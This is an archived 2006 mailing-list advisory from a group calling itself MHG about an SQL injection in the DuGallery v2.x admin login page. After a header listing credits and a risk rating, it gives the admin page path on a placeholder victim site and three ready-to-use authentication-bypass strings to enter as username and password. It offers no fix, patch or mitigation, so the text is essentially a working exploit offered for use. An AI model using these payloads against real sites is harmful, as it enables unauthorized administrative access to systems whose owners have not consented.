# MHG Security Team --- DuGallery V2.x SQL Injection
Date: 9 May 2006 18:01:36 -0000
From: [email protected]
To: [email protected]
Subject: # MHG Security Team --- DuGallery V2.x SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
# Milli-Harekat Advisory ( www.milli-harekat.org )
# DUGaleri Admin SQL Injection
# Risk : High
# Script : DUGallery v2.x
# Credits : Dj ReMix
# Thanks : ъy Korsan , ESKOBAR , Poizonb0x , TR_IP , SariKamis
DuGallery Admin Page's www.victim.com/[DuGallery Path ]/admin_default.asp
Login and password :
'or'
'or"1=1'
'or"='
Bye !
